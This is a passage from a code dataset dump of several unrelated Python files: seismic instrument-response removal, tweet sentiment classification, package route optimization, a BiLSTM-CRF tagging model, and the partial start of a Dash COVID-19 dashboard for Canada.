for x in EVS_ho_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats)))\n\n\tprint('\\nfinished!')\n\nif __name__ == '__main__':\n\tmain()","sub_path":"ML_regression.py","file_name":"ML_regression.py","file_ext":"py","file_size_in_byte":16361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234425906","text":"# -------------------------------\n#| Robert Green GFZ Potsdam |\n#| 2017-11-03 |\n# -------------------------------\n\"\"\"\nModule containing functions for use in instrument response removal.\n\"\"\"\n\ndef deconvolve_with_pz(st,response_prefilt,pz) :\n '''\n Deconvolves stream using the supplied polezero dictionary\n -Demeans and detrends each trace of stream\n -Applies 1% taper to prevent ringing at the end of traces\n -Prefilters data prior to deconvolution to prevent amplication of noise\n\n response_prefilt=(f1,f2,f3,f4) - tuple, where f1= 2*f3\n\n Taper fraction 0.01 means you lose 7 mins both at start and end of a 24 hour file\n\n Obspy pole-zero dictionaries\n (1) \"poles\" should be a list of tuples, e.g. [(x+yj),(r+sj)]\n (2) \"zeros\" should be a list of complexes, e.g. [0j,0j]\n (3) \"sensitivity\" is the total sensitivity and is used if remove_sensitivity=true \n \"digitizer gain\" and \"seismometer gain\" are floats but are passive and there for reference. \n Multiplied together they give the \"sensitivity\"\n (4) \"gain\" is actually the A0 normalisation factor, the factor that defines the amplitude of pole-zero\n curve at 1 Hz.\n\n N.B. In most case using the poles and zeros is sufficient for instrument response\n removal, unless you are working close to the NYQUIST frequency, in which case the\n effects of the FIR filters can become more important. The FIR filter can cause:\n -Slight rippling (in amplitude) near Nyquist frequency\n -Acausal ringing for sharp onsets (ringing is at frequencies near Nyquist)\n\n '''\n for tr in st :\n tr.detrend('demean')\n tr.detrend('linear')\n st.simulate(paz_remove=pz,remove_sensitivity=True,\n pre_filt=response_prefilt,paz_simulate=None,\n taper=True, taper_fraction=0.01)\n return st\n\n\ndef get_pazdictfrominventory(inventory,tr):\n ''' Reads an obspy station inventory object and\n for a given trace returns the obspy paz dictionary \n\n Obspy pole-zero dictionaries\n (1) \"poles\" should be a list of tuples, e.g. [(x+yj),(r+sj)]\n (2) \"zeros\" should be a list of complexes, e.g. [0j,0j],\n (3) \"sensitivity\" is the total sensitivity and is used if remove_sensitivity=true \n \"digitizer gain\" and \"seismometer gain\" are floats but are passive and there for reference. \n Multiplied together they give the \"sensitivity\"\n (4) \"gain\" is actually the A0 normalisation factor, the factor that defines the amplitude of pole-zero\n curve at 1 Hz.\n '''\n inv=inventory.get_response(tr.id,tr.stats.starttime)\n polezerostage=inv.get_paz()\n totalsensitivity=inv.instrument_sensitivity\n pzdict={}\n pzdict['poles']=polezerostage.poles\n pzdict['zeros']=polezerostage.zeros\n pzdict['gain']=polezerostage.normalization_factor\n pzdict['sensitivity']=totalsensitivity.value\n return pzdict\n\n\ndef read_sacpzfile(file):\n ''' Reads a sac format poles-zero file\n Expects ZEROS, POLES and CONSTANT as keywords\n Returns a paz dictionary \n Gain is set to 1. \n Sensitivity is set to CONSTANT \n\n Obspy pole-zero dictionaries\n (1) \"poles\" should be a list of tuples, e.g. [(x+yj),(r+sj)]\n (2) \"zeros\" should be a list of complexes, e.g. [0j,0j]\n (3) \"sensitivity\" is the total sensitivity and is used if remove_sensitivity=true \n \"digitizer gain\" and \"seismometer gain\" are floats but are passive and there for reference. \n Multiplied together they give the \"sensitivity\"\n (4) \"gain\" is actually the A0 normalisation factor, the factor that defines the amplitude of pole-zero\n curve at 1 Hz.\n\n '''\n from obspy.core import UTCDateTime\n fid=open(file)\n instpaz={'gain':1.}\n Z=False\n P=False\n zeros=[];poles=[]\n for line in fid:\n line=line.rstrip()\n line=line.split()\n if line[0] == 'CONSTANT':\n instpaz['sensitivity']=float(line[1])\n continue\n if line[0] == 'ZEROS':\n numofZ=int(line[1])\n Z=True\n zcount=0\n continue\n if Z:\n zeros.append(complex(float(line[0]),float(line[1])))\n zcount+=1\n if zcount == numofZ:\n Z=False\n instpaz['zeros']=zeros\n if line[0] == 'POLES':\n numofP=int(line[1])\n P=True\n pcount=0\n continue\n if P:\n poles.append(complex(float(line[0]),float(line[1])))\n pcount+=1\n if pcount == numofP:\n P=False\n instpaz['poles']=poles\n fid.close()\n return instpaz\n","sub_path":"greentools/response_removal.py","file_name":"response_removal.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206790799","text":"\nimport re\nimport string\nimport csv\nfrom vaderSentiment.vaderSentiment import sentiment as vaderSentiment\nfrom pymongo import MongoClient\nimport reader\nfrom collections import Counter\n\n\n#stop_words |= set(['URL', 'ATUSER', 'obama', 'barack', 'romney', 'mitt', 'rt', 'election', 'vote'])\ntrump_words = {'#tcot': 'r', 'tlot': 'r', '#teaparty': 'r', '#conservative': 'r', '#ocra': 'r'}\nswing_words = set(['#vote', '#obama', '#romney', '#gop'])\nbad_words = set(['canada', 'hunger'])\nfeat_list = set([])\nvader_threshold = 0.05\n\n'''\ndef processTweet(tweet):\n\ttweet = tweet.lower()\n\ttweet = re.sub('((www\\.[^\\s]+)|((http|https)://[^\\s]+))', 'URL', tweet)\n\ttweet = re.sub('@[^\\s]+', 'ATUSER', tweet)\n\ttweet = tweet.translate(string.maketrans(\"\",\"\"), string.punctuation)\n\treturn tweet\t\n\ndef replaceOverTwo(word):\n\tpattern = re.compile(r\"(.)\\1{1,}\", re.DOTALL)\n\treturn pattern.sub(r\"\\1\\1\", word)\n\ndef getFeatVector(tweet):\n\tvec = []\n\twords = tweet.split(\" \")\n\tfor w in words:\n\t\tw = replaceOverTwo(w)\n\t\tx = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n\t\tif w not in stop_words and x != None:\n\t\t\tvec.append(w)\n\treturn vec\n\ndef extractFeatures(vec):\n\twords = set(vec)\n\tfeats = {}\n\tfor feat in feat_list:\n\t\tif feat in words:\n\t\t\tfeats[feat] = True\n\t\telse:\n\t\t\tfeats[feat] = False\n\treturn feats\n\ndef getTrainingSet():\n\n\tglobal feat_list\n\n\ttweets = []\n\tfilename = 'training1.csv'\n\n\twith open(filename, 'rb') as fin:\n\t\tcsvin = csv.reader(fin)\n\t\tfor row in csvin:\n\t\t\tsentiment = ''\n\t\t\tif row[0] == '0':\n\t\t\t\tsentiment = '-'\n\t\t\telif row[0] == '4':\n\t\t\t\tsentiment = '+'\n\t\t\telse:\n\t\t\t\tsentiment = '0'\n\t\t\ttweets.append((getFeatVector(processTweet(row[5])), sentiment))\n\n\tprint(\"TEST1\")\n\tfor t in tweets:\n\t\tfeat_list |= set(t[0])\n\tprint(\"TEST2\")\n\treturn nltk.classify.util.apply_features(extractFeatures, tweets)\n\ndef NaiveBayes():\n\ttraining_set = getTrainingSet()\n\tprint(len(training_set))\n\tprint(type(training_set))\n\tclassifier = nltk.NaiveBayesClassifier.train(training_set)\n\tprint(\"TEST3\")\n\tprint(classifier.show_most_informative_features(20))\n'''\n\ndef getTrainingSet():\n\n\tfilename = 'debate08_sentiment_tweets.tsv'\n\tfeat_list = {}\n\n\twith open(filename, 'rU') as fin:\n\t\treader = csv.reader(fin, delimiter='\\t')\n\t\tfor row in reader:\n\t\t\tif row[0][0] != '9':\n\t\t\t\tcontinue\n\t\t\ttext = row[2]\n\t\t\ttext = processTweet(text)\n\t\t\t\n\t\t\tscore = 0\n\t\t\tfor i in xrange(5, len(row)):\n\t\t\t\tif row[i] == '1':\n\t\t\t\t\tscore -= 1\n\t\t\t\tif row[i] == '2':\n\t\t\t\t\tscore += 1\n\n\tfeat_counts = Counter(feat_list).most_common\n\n\n\ndef score_to_sentiment(score):\n\tsentiment = 'neu'\n\tif score > vader_threshold:\n\t\tsentiment = 'pos'\n\tif score < -vader_threshold:\n\t\tsentiment = 'neg'\n\treturn sentiment\n\ndef getVADERSentiment(text):\n\ttext = text.lower()\n\tscore = vaderSentiment(text)['compound']\n\tsentiment = score_to_sentiment(score)\n\tsubject = reader.getSubject(text)\n\n\t#if sentiment == 'neu':\n\tfor w in trump_words:\n\t\tif w in text:\n\t\t\tif trump_words[w] == subject:\n\t\t\t\treturn 'pos'\n\t\t\treturn 'neg'\n\tfor w in swing_words:\n\t\tif w in text:\n\t\t\treturn 'pos'\n\tfor w in bad_words:\n\t\tif w in text:\n\t\t\treturn 'neg'\n\n\treturn sentiment\n\ndef ClassifyAll(func):\n\tclient = MongoClient()\n\tdb = client.twitter\n\ttweets = db.tweets.find()\n\tfor t in tweets:\n\t\ttext = t['text'].encode('utf-8')\n\t\tsentiment = func(text)\n\t\tdb.tweets.update_one(\n\t\t\t{'id': t['id']}, \n\t\t\t{'$set': {'sentiment': sentiment}}\n\t\t)\n\ndef test(func, method, filename):\n\tcorrect = 0\n\ttotal = 0\n\twith open(filename, 'rb') as fin:\n\t\treader = csv.reader(fin)\n\t\tfor row in reader:\n\t\t\tanswer = int(row[0])\n\t\t\tsent = func(row[5])\n\t\t\tscore = 2\n\t\t\tif sent == 'pos':\n\t\t\t\tscore = 4\n\t\t\tif sent == 'neg':\n\t\t\t\tscore = 0\n\t\t\tif score == answer:\n\t\t\t\tcorrect += 1\n\t\t\ttotal += 1\n\tprint('%s Accuracy: %.3f%%' %(method, float(correct)/total*100))\n\n","sub_path":"sent_analysis.py","file_name":"sent_analysis.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"358131541","text":"#!/cygdrive/c/Python34/python\n\"\"\"\nFunctions for route optimization. If run independently, this script\ntakes in two arguments, the from and to stops, and prints out\nseveral viable routes based on different parameters.\n\"\"\"\nfrom netgraph import NetGraph\nimport argparse\nimport sys\nimport itertools\nimport namespace\nimport random\nimport gen\nimport csv\nfrom debug import *\nfrom exceptions import *\nfrom datetime import timedelta\n\n\nROUTE_DEBUG = True\n\n\ndef route_dprint(fmt, args=None):\n if ROUTE_DEBUG:\n if args is not None:\n dprint(fmt % args)\n else:\n dprint(fmt)\n\n\ndef route(G, candidates, params):\n \"\"\"\n Find paths for each of package in candidates.\n candidates is a list of 3-tuples (packageid, from, to)\n\n params are the optimization parameters to use.\n params.k is the number of paths to consider for each (from, to) pair.\n params.sampling_method = [\"single_sequencial\" | \"batch_sequencial\" | \"random\"]\n \"sequencial\" routes all package from a stop at a time.\n \"random\" picks a random stop, routes a single package from that stop and repeats until\n all are routed.\n\n This method gives a generator of (pid, path)\n \"\"\"\n # for some overall stats\n total_lat = timedelta()\n total_packages_received = len(candidates)\n total_packages_routed = 0\n min_lat = timedelta(days=10)\n max_lat = timedelta()\n paths_found = 0\n\n # a dict of the routing requests and info associated.\n reqs = {}\n reqs2 = {}\n for p, s, t in candidates:\n if (s, t) in reqs:\n reqs[(s, t)].packages_to_route.append(p)\n else:\n # initialize records.\n reqs[(s, t)] = namespace.Namespace()\n reqs[(s, t)].packages_to_route = [p]\n reqs[(s, t)].packages_routed = []\n reqs[(s, t)].paths = None\n\n # get possible paths from each stop to each destination and update reqs.\n for (s, t), rec in reqs.items():\n paths = G.k_shortest_paths(s, t, params.k)\n rec.paths = paths\n if len(paths) > 0:\n paths_found += 1\n\n # Compute flow\n mf = G.max_flow(reqs.keys())\n\n # Summary.\n for (s, t), rec in reqs.items():\n route_dprint(\"Packages to route from %d to %d\" % (s, t))\n route_dprint(rec.packages_to_route)\n route_dprint(\"\\nPossible paths: \")\n if len(rec.paths) == 0:\n route_dprint(\"no paths found\")\n for path in rec.paths:\n route_dprint(path)\n route_dprint(\"\\n\\n\")\n\n # write out the graph we're operating on.\n G.view(filename=\"diagrams/latest.gv\")\n\n # Route############################################\n\n # Initialize 'assigned' attribute of each edge.\n for edge in G.edges().values():\n edge[\"assigned\"] = 0\n\n if params.sampling_method == \"batch\":\n # for each (from, to) pair, route as many packets as possible.\n for rec in reqs.values():\n # for each package, use the first path that works.\n for pid in rec.packages_to_route:\n for path in rec.paths:\n try:\n path.use(pid)\n except PathFull:\n route_dprint(\"path full\")\n continue\n else:\n # I got a valid path. update records.\n rec.n_packages_routed += 1\n lat = path.latency()\n total_lat += lat\n total_packages_routed += 1\n if lat < min_lat:\n min_lat = lat\n if lat > max_lat:\n max_lat = lat\n\n route_dprint(\"\\nPATH CHOSEN for package %d: \", args=pid)\n route_dprint(path)\n yield (pid, path)\n break\n\n elif params.sampling_method == \"random\":\n # pick a random (from, to) pair, route a single package. Repeat until all\n # are routed. or until 50 consecutive failures to route.\n # Initialize flows to maximum (i.e, capacity)\n for edge in G.edges().values():\n edge[\"assigned\"] = 0\n edge[\"flow\"] = edge[\"capacity\"]\n\n for i in range(len(reqs)):\n\n # attempt to route a random package\n (s, t) = random.choice([k for k in reqs.keys()])\n rec = reqs[(s, t)]\n if len(rec.paths) == 0:\n route_dprint(\"no paths\")\n continue\n for j in range(len(rec.packages_to_route)):\n pid = rec.packages_to_route.pop()\n no_path_found = True\n for path in rec.paths:\n try:\n path.use(pid)\n except PathFull:\n route_dprint(\"path full\")\n continue\n else:\n # I got a valid path. update records.\n no_path_found = False\n rec.packages_routed.append(pid)\n lat = path.latency()\n total_lat += lat\n total_packages_routed += 1\n if lat < min_lat:\n min_lat = lat\n if lat > max_lat:\n max_lat = lat\n\n route_dprint(\"\\nPATH CHOSEN for package %d: \", args=pid)\n route_dprint(path)\n yield (pid, path)\n break\n if no_path_found:\n # put it back, and increment no_path_count.\n rec.packages_to_route.append(pid)\n reqs[(s, t)] = rec\n\n else:\n route_dprint(\"bad sampling type\")\n\n # Print out Summary. #########################################################\n route_dprint(\"=================================================\")\n route_dprint(\"Request Summary\")\n for (s, t), rec in reqs.items():\n print(\"%d->%d: %d packages\" % (s, t, len(rec.packages_to_route) + len(rec.packages_routed)))\n\n route_dprint(\"\\n\\nRouting Summary\")\n string = \"\"\n for (s, t), rec in reqs.items():\n string += \"%d->%d: routed %d/%d packages \\n\" % \\\n (s, t,\n len(rec.packages_routed),\n len(rec.packages_routed) + len(rec.packages_to_route))\n\n # global stats.\n if total_packages_routed > 0:\n string += \"\\nmaximum latency: %s\\n\" % str(max_lat)\n string += \"minimum latency: %s\\n\" % str(min_lat)\n string += \"average latency: %s\\n\" % str(total_lat/total_packages_routed)\n string += \"%d/%d packages routed.\\n\" % (total_packages_routed, total_packages_received)\n string += \"computed maximum flow: %f\\n\" % mf\n string += \"paths found: %d\" % paths_found\n\n route_dprint(string)\n\n route_dprint(\"==================================================\")\n\n\ndef print_routes(routes):\n \"\"\"\n Pretty-print routes to stdout.\n \"\"\"\n for pid, path in routes:\n string = \"Package ID: %d\" % pid\n string += str(path)\n print(string)\n\n\ndef run(G, tests, k=5, method=\"batch\"):\n \"\"\"\n If filename has been provided, run queries in the file. Otherwise generate\n queries using function, and run them.\n \"\"\"\n\n candidates = []\n if callable(tests):\n candidates = tests()\n else:\n # interpret as filename\n with open(tests, newline='') as testfile:\n # comments start with '#'. ignore blank lines.\n reader = csv.DictReader(filter(lambda rw: rw[0] != '#', testfile))\n for row in reader:\n if row:\n PID = int(row[\"PackageID\"].strip())\n From = int(row[\"From\"].strip())\n To = int(row[\"To\"].strip())\n candidates.append((PID, From, To))\n\n # Get params\n params = namespace.Namespace()\n params.k = k\n params.sampling_method = method\n\n route_dprint(\"Running test:\")\n for pid, s, t in candidates:\n route_dprint(\"%d, from %d to %d\", args=(pid, s, t))\n\n routes = route(G, candidates, params)\n for r in routes:\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-g', '--graph',\n help='specify what kind of graph to build.',\n metavar='')\n parser.add_argument('-f', '--file',\n help='run tests on file provided',\n metavar='')\n parser.add_argument('-t', '--test',\n help='run randomized tests on graph built. '\n 'random queries are generated and stored in tests/random_stops.txt',\n metavar='')\n parser.add_argument('-k', '--k',\n help='no. of shortest paths to consider between each pair',\n metavar='')\n parser.add_argument('-m', '--method',\n help='sampling method to use',\n metavar='')\n\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_usage()\n return\n\n # Get graph\n if args.graph:\n G = NetGraph(graphtype=args.graph)\n else:\n G = NetGraph()\n\n # run\n if args.file:\n if args.k:\n run(G, args.file, k=int(args.k))\n elif args.method:\n run(G, args.file, method=args.method)\n elif args.k and args.method:\n run(G, args.file, k=int(args.k), method=args.method)\n else:\n run(G, args.file)\n elif args.test:\n if args.k:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), k=int(args.k))\n elif args.method:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), method=args.method)\n elif args.k and args.method:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), k=int(args.k), method=args.method)\n else:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)))\n\nif __name__ == \"__main__\":\n main()","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611243058","text":"\"\"\"\noutput.py - module to store BiLSTM-CRF model\n\"\"\"\n\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import Input, LSTM, Embedding, TimeDistributed, Dropout, Bidirectional, Dense\nfrom tensorflow.keras.initializers import Constant\nfrom .loss import CRF\n\ndef embedding_map(glove_path = 'glove.6B.200d.txt'):\n \"\"\"\n embedding_map - function to load weights of the pretrained Glove embedding file\n Parameters:\n glove_path I/P path to the pretrained Glove embedding file\n embedding_index\t\tO/p\tweights of the pretrained Glove embedding file\n \"\"\"\n embeddings_index = {}\n with open(glove_path) as f:\n for line in f:\n word, coefs = line.split(maxsplit = 1)\n coefs = np.fromstring(coefs, 'f', sep = ' ')\n embeddings_index[word] = coefs\n print('Found %s word vectors.' %len(embeddings_index))\n return embeddings_index\n\ndef embedding_layer(word2dix, input_dim, output_dim, input_length, mask_zero):\n embedding_index = embedding_map()\n\n embedding_matrix = np.zeros((input_dim, output_dim))\n for word, i in word2dix.items():\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n return Embedding(input_dim = input_dim, output_dim = output_dim, input_length = input_length, trainable = False, embeddings_initializer = Constant(embedding_matrix))\n\ndef bilstm_crf(word2dix, maxlen, n_tags, embedding_dim, n_words, mask_zero, training = True):\n \"\"\"\n bilstm_crf - module to build BiLSTM-CRF model\n Inputs:\n - input_shape : tuple\n Tensor shape of inputs, excluding batch size\n Outputs:\n - output : tensorflow.keras.outputs.output\n BiLSTM-CRF output\n \"\"\"\n input = Input(shape = (maxlen,))\n # Embedding layer\n embeddings = embedding_layer(word2dix = word2dix, input_dim = n_words + 1, output_dim = embedding_dim, input_length = maxlen, mask_zero = mask_zero)\n output = embeddings(input)\n\n # BiLSTM layer\n output = Bidirectional(LSTM(units = 50, return_sequences = True, recurrent_dropout = 0.1))(output)\n\n # Dense layer\n output = TimeDistributed(Dense(n_tags, activation = 'relu'))(output)\n\n output = CRF(n_tags, name = 'crf_layer')(output)\n return Model(input, output)\n","sub_path":"AdvancedML/BiLSTM-CRF/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"107539523","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table as dt\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom dash.dependencies import Input, Output\n\nimport pandas as pd\n\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_stylesheets = ['https://codepen.io/amyoshino/pen/jzXypZ.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nserver = app.server \n\napp.title = 'COVID-19 Dashboard'\n\n# ----------------- Styling ------------------------------------------------\n\ncolors = {\n 'background': '#222222',\n 'text': '#DCDCDC',\n 'grid': \"#434343\",\n 'line': '#72bcd4',\n 'bar': '#FFB266',\n}\n\nstats_charts_style = dict(\n\tplot_bgcolor = colors['background'],\n\tpaper_bgcolor = colors['background'],\n\tfont = {'color': colors['text']},\n\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\n)\n\ntabs_styles = {'height': '44px', 'padding-left': 20, 'padding-right': 120}\n\ntab_style = {\n\t'borderBottom': '1px solid #d6d6d6',\n\t'padding': '6px',\n\t'fontWeight': 'bold',\n\t'backgroundColor': '#222222',\n\t'color': '#DCDCDC'\n}\n\ntab_selected_style = {\n\t'borderTop': '1px solid #d6d6d6',\n\t'borderBottom': '1px solid #d6d6d6',\n\t'backgroundColor': '#4682B4',\n\t'color': 'white',\n\t'padding': '6px'\n}\n\nindicator_style = {\n\t'backgroundColor': colors['line'],\n\t'display':'inline-block',\n\t'height': 130,\n\t'width': 180,\n\t'textAlign': 'center',\n\t'margin-right': 30,\n\t'color': colors['text'],\n\t'fontWeight': 'bold',\n\n}\n\n\n\n\n# ----------------- Part One Data Preparation -----------------------------------------------\n\n# import the data \nSPREADSHEET_ID = '1D6okqtBS3S2NRC7GFVHzaZ67DuTw7LX49-fqSLwJyeo'\nRANGE_NAME = 'Cases'\nurl = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME)\ndf = pd.read_csv(url)\n# Change datatype of some columns\ndf.provincial_case_id = df.provincial_case_id.astype('object')\ndf.travel_yn = df.travel_yn.astype('bool')\n# Define the date and time format and conver the 'date_report' column to datetime type\ndf['date_report'] = pd.to_datetime(df['date_report']).dt.strftime('%d/%m/%Y')\ndf['date_report'] = pd.to_datetime(df['date_report'])\n# data for all canada's cumulative case\ndff = df.copy()\ndff = dff.set_index('date_report')\n\n# draw the map\nprovince_case = pd.DataFrame(df.province.value_counts()).reset_index().\\\nrename(columns={'index':'province', 'province':'cases'})\n\ngeo = {'Quebec': [53, -70],\n 'Ontario': [50, -85],\n 'BC': [53.72669, -127.647621],\n 'Alberta': [55, -115],\n 'Nova Scotia': [45, -63], \n 'NL': [53, -60],\n 'Saskatchewan': [55, -106],\n 'New Brunswick': [46.498390, -66.159668],\n 'PEI': [46.25, -63],\n 'Yukon': [64, -135],\n 'NWT': [64.2667, -119.1833], \n 'Manitoba': [53.76086, -98.813873]}\n\ngeo_df = pd.DataFrame(geo).transpose().reset_index().\\\nrename(columns = {'index':'province', 0:'lat', 1: 'lon'})\n\nprovince_case = pd.merge(province_case, geo_df)\n\ntoken = 'pk.eyJ1Ijoic3VueWFuZzA0MjYiLCJhIjoiY2s4MHV0MWNkMDRpcTNmcHFmOWhwaWoxZiJ9.hIMx3CyEx3erYGxBjnLX9Q'\n\nfig = px.scatter_mapbox(province_case, \n lon = 'lon', lat = 'lat', \n hover_name = 'province',\n size = 'cases', size_max = 45,\n color_discrete_sequence = ['#72bcd4'], \n width = 500, height = 500,\n )\n\nfig.update_layout(mapbox = {'accesstoken': token, \n 'center': {'lon': -100.3467712, 'lat':60.1303673},\n 'zoom': 1.85},\n mapbox_style ='dark', paper_bgcolor = colors['background'],\n margin = {'l': 10, 'r': 10, 't':10, 'b':10})\n\n## data for the canada line chart\ncanada = pd.DataFrame(dff.index.value_counts()).reset_index()\ncanada = canada.set_index('index')\ncanada = canada.resample('d').sum().fillna(0)\ncanada['cumu'] = canada['date_report'].cumsum()\n\n# generate the canada chart\n\n# import dataframes for other stats\nRANGE_NAME_1 = 'Mortality'\nRANGE_NAME_2 = 'Recovered'\nRANGE_NAME_3 = 'Testing'\n\nurl_1 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_1)\nurl_2 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_2)\nurl_3 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_3)\n\nmortality = pd.read_csv(url_1)\nrecovered = pd.read_csv(url_2)\ntesting = pd.read_csv(url_3)\n\ndef rename_first_column(dataframe):\n dataframe = dataframe.rename(columns={dataframe.columns[0]: 'id'})\n return dataframe\n\ntesting = rename_first_column(testing)\nmortailty = rename_first_column(mortality)\nrecovered = rename_first_column(recovered)\n\n# ------------------------ Prepare data for the Sankey diagram --------------\nsankey_df = pd.read_csv('sankey_df.csv')\n\n# A function to generate Sankey diagram. \n# Credit to https://medium.com/kenlok/how-to-create-sankey-diagrams-from-dataframes-in-python-e221c1b4d6b0\ndef genSankey(df,cat_cols=[],value_cols=''):\n labelList = []\n for catCol in cat_cols:\n labelListTemp = list(set(df[catCol].values))\n labelList = labelList + labelListTemp\n # transform df into a source-target pair\n for i in range(len(cat_cols)-1):\n if i==0:\n sourceTargetDf = df[[cat_cols[i],cat_cols[i+1],value_cols]]\n sourceTargetDf.columns = ['source','target','count']\n else:\n tempDf = df[[cat_cols[i],cat_cols[i+1],value_cols]]\n tempDf.columns = ['source','target','count']\n sourceTargetDf = pd.concat([sourceTargetDf,tempDf])\n sourceTargetDf = sourceTargetDf.groupby(['source','target']).agg({'count':'sum'}).reset_index() \n # add index for source-target pair\n sourceTargetDf['sourceID'] = sourceTargetDf['source'].apply(lambda x: labelList.index(x))\n sourceTargetDf['targetID'] = sourceTargetDf['target'].apply(lambda x: labelList.index(x)) \n # creating the sankey diagram\n data = dict(\n type='sankey',\n valueformat = '.f',\n node = dict(\n pad = 10,\n thickness = 30,\n line = dict(\n color = \"black\",\n width = 0.5\n ),\n label = labelList,\n color = colors['line']\n ),\n link = dict(\n source = sourceTargetDf['sourceID'],\n target = sourceTargetDf['targetID'],\n value = sourceTargetDf['count'],\n\n )\n )\n \n layout = dict(\n font = dict(\n size = 10\n ), \n plot_bgcolor=colors['background'],\n paper_bgcolor=colors['background'],\n height = 450, \n margin = {'l':50, 'b':40, 't':30, 'r':50}\n )\n \n fig = go.Figure(data = [go.Sankey(data)], layout = layout)\n return fig\n\n\n\n\n\n\n# --------------- Part Two. App layout ---------------------\n\napp.layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n\t# Headline\n html.H1(\n children='Tracking COVID-19 in Canada',\n style={\n 'textAlign': 'center',\n 'color': colors['text'],\n 'padding-top': 30,\n }\n ),\n # # Dashboard Intro\n html.Div(children=[\n \thtml.P(\"This dashboard tracks the number and distribution of COVID-19 cases in Canada in real-time. \\\n \t\tData used for this project is a publicly available dataset collected by \", \n \t\tstyle = {'display': 'inline'}),\n \thtml.A('COVID-19 Canada Open Data Working Group', href = 'https://github.com/ishaberry/Covid19Canada', \n \t\ttarget = '_blank',\n \t\tstyle = {'display': 'inline'}),\n \thtml.P(\". This dashboard allows a user to filter cumulative cases and daily \\\n \t\tincrease in a province or territory.\", style = {'display': 'inline'}),\n \thtml.P(df.columns[0].split('Please')[0]),\n\n \t], \n\n \tstyle={ 'textAlign': 'left',\n\t\t\t 'color': colors['text'],\n\t\t\t 'padding-left': 70,\n\t\t\t 'padding-right': 70}\n\t ),\n\n # indicators\n html.Div([\n \thtml.Div([html.H3(df.shape[0]), \n \t\t\t html.H5('Confirmed')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(mortailty.shape[0]),\n \t\t\t html.H5('Deaths')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(recovered.groupby('province').cumulative_recovered.max().sum()),\n \t\t\t html.H5('Recovered')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n \thtml.Div([html.H3(testing.groupby('province').cumulative_testing.max().sum()),\n \t\t\t html.H5('Testing')], \n \t\t\t style = indicator_style, \n \t\t\t className = 'three columns'),\n\n \t], className = 'row', style = {'margin-top': 30, 'padding-left': 150}),\n\n\n # Overview of the country (map and line chart)\n html.Div([\n\n \t# line chart\n \thtml.Div([\n \t\t# selector\n \t\thtml.Div([\n\t \t\tdcc.RadioItems(\n\t \t\t\tid = 'scale-type',\n\t \t\t\toptions = [{'label': i, 'value': i} for i in ['Linear', 'Log']],\n\t \t\t\tvalue = 'Log',\n\t \t\t\tlabelStyle = {'display': 'inline-block'},\n\t \t\t\tstyle = {'background': colors['background'], \n\t \t\t\t\t\t'color': colors['text'], \n\t \t\t\t\t\t'padding-top': 40,\n\t \t\t\t\t\t'padding-left': 70,}\n\t \t\t\t)\n \t\t ]),\n \t\t# the chart\n \t\thtml.Div([\n\t \t\tdcc.Graph(\n\t \t\t\tid = 'canada-line',\n\t \t\t\t)\n \t\t ])\n \t\t], className = 'six columns'),\n\n \t# map\n \thtml.Div([\n \t\thtml.Div([\n\t \t\tdcc.Graph(\n\t \t\t\tid = 'canada-map',\n\t \t\t\tfigure = fig,\n\t \t\t\t)]),\n \t\t], className = 'six columns')\n\t ], className = 'row', style = {'padding-top': 50}), # end of country overview\n\n\n\n # # curve by province\n html.Div([\n # \t# selectors + line chart\n \thtml.Div([\n \t\t# selector Dropdown\n \t\thtml.Div([\n \t\t\thtml.P(children = 'Choose a province from the dropdown menu', \n \t\t\t\tstyle = {'backgroundColor': colors['background'],\n \t\t\t\t\t\t'color': colors['text']}),\n\n \t\t\tdcc.Dropdown(\n \t\t\t\tid = 'province-select',\n \t\t\t\toptions = [ \n \t\t\t\t\t\t\n \t\t\t\t\t\t\t{'label': i, 'value': i} for i in df['province'].unique()\n\n \t\t\t\t\t\t\t],\n \t\t\t\tvalue = 'Ontario',\n \t\t\t\t),\n \t\t\t], style = { 'padding-left': 70, 'padding-right': 100}),\n \t\t# selector RadioItems\n \t\thtml.Div([\n \t\t\thtml.P(children = 'Choose a calculation type',\n 